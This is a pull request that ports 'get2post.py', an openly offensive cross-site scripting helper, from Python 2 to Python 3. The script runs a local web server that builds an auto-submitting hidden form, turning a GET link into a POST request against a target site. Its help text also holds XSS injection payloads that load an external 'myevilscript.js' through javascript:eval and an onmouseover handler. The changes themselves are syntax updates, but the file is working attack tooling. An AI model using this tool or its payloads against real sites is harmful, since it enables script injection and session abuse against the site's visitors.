### PR TITLE
Converted get2post.py to python 3

### DIFF
--- a/get2post.py
+++ b/get2post.py
@@ -1,48 +1,47 @@
 #XSS GET to POST script by mark baggett http://www.pauldotcom.com
-#start it like this...    python get2post.py
+#start it like this...    python3 get2post.py
 #use it like this...  http://<yourIPaddress>:8080/?target=http://www.targeturl.com&postparam=postvalue&anotherparam=itsvalue&postvariable=itsvalue
 
-import os
 import sys
-import BaseHTTPServer
-import urlparse
+import http.server
+import urllib.parse
 import re
 
-class XSSWebHandler(BaseHTTPServer.BaseHTTPRequestHandler):
+class XSSWebHandler(http.server.BaseHTTPRequestHandler):
   clientfilter=""
   def do_GET(self):
     self.send_response(200)
     self.end_headers()
-    (ignore, ignore, ignore, urlparams, ignore) = urlparse.urlsplit(self.path)
+    (ignore, ignore, ignore, urlparams, ignore) = urllib.parse.urlsplit(self.path)
     tgturl=re.search("target=(http://[\w.:]+)",urlparams)
     #pdb.set_trace()
     if self.clientfilter and self.client_address[0] != self.clientfilter:
-      self.wfile.write('<html><body>Go Away.</body></html>')
+      self.wfile.write(b'<html><body>Go Away.</body></html>')
       return
     if not tgturl:
-      self.wfile.write('<html><body>You need to specify a target parameter and post parameters.<p>For example:  http://thishost.com?target=http://victim.com/xssvulnerable.php&postparam1=postvalue1<p><p>Notes: These have been useful in the past. <p> Inject into current page without &gt and &lt :javascript:eval("s=document.createElement(\'script\');s.src=\'myevilscript.js\';document.getElementsByTagName(\'head\')[0].appendChild(s)")<p><p> Same thing on a javascript event :onmouseover="s=document.createElement(\'script\');s.src=\'myevilscript.js\';document.getElementsByTagName(\'head\')[0].appendChild(s)"</body></html>')
+      self.wfile.write(b'<html><body>You need to specify a target parameter and post parameters.<p>For example:  http://thishost.com?target=http://victim.com/xssvulnerable.php&postparam1=postvalue1<p><p>Notes: These have been useful in the past. <p> Inject into current page without &gt and &lt :javascript:eval("s=document.createElement(\'script\');s.src=\'myevilscript.js\';document.getElementsByTagName(\'head\')[0].appendChild(s)")<p><p> Same thing on a javascript event :onmouseover="s=document.createElement(\'script\');s.src=\'myevilscript.js\';document.getElementsByTagName(\'head\')[0].appendChild(s)"</body></html>')
       return
 
-    self.wfile.write('<html><body><form name="form1" method="post" id="form1" action="%s">' % (tgturl.group(1)))
+    self.wfile.write(('<html><body><form name="form1" method="post" id="form1" action="%s">' % tgturl.group(1)).encode('utf-8'))
 
     params=urlparams.split("&")
     for param in params:
-	paramvalue=param.split("=")
-        if paramvalue[0] != "target":
-          self.wfile.write('<input type="hidden" name="%s" id="%s" value="%s" />' % (paramvalue[0], paramvalue[0], paramvalue[1]) )
+      paramvalue=param.split("=")
+      if paramvalue[0] != "target":
+        self.wfile.write(('<input type="hidden" name="%s" id="%s" value="%s" />' % (paramvalue[0], paramvalue[0], paramvalue[1])).encode('utf-8'))
 
-    self.wfile.write('</form><script>document.form1.submit();</script></body></html>')
+    self.wfile.write(b'</form><script>document.form1.submit();</script></body></html>')
 
 
 def main():
   serverport=8080
   tmpclientfilt=""
   if '-h' in sys.argv:
-    print """Usage:   get2post.py [options] 
+    print("""Usage:   get2post.py [options] 
  Options:
 -p server port     Define a port for the server to listen on.  Default 8080
 -c clientip        Filter incoming connections and only allow the specified client to use the tool.
-"""	
+""")
     sys.exit(2)
   for i in range(1,len(sys.argv),1):
     if sys.argv[i] == '-p':
@@ -50,9 +49,9 @@ def main():
     if sys.argv[i] == '-c':
       tmpclientfilt=sys.argv[i+1]
 
-  server = BaseHTTPServer.HTTPServer(('', serverport), XSSWebHandler)
+  server = http.server.HTTPServer(('', serverport), XSSWebHandler)
   XSSWebHandler.clientfilter=tmpclientfilt
-  print 'XSS Server is Ready..'
+  print('XSS Server is Ready..')
   server.serve_forever()
 
 if __name__ == '__main__':


### PR DESCRIPTION
Converted python 2 code to python 3. Made as few changes as possible and used the same coding style as the original script. The following are notable changes:

1. Used http.server.BaseHTTPRequestHandler instead of BaseHTTPServer.BaseHTTPRequestHandler.
2. Changed urlparse.urlsplit to urllib.parse.urlsplit.
3. Updated the code for python 3's method of handling bytes (b'<str>' and <str>.encode('utf-8'))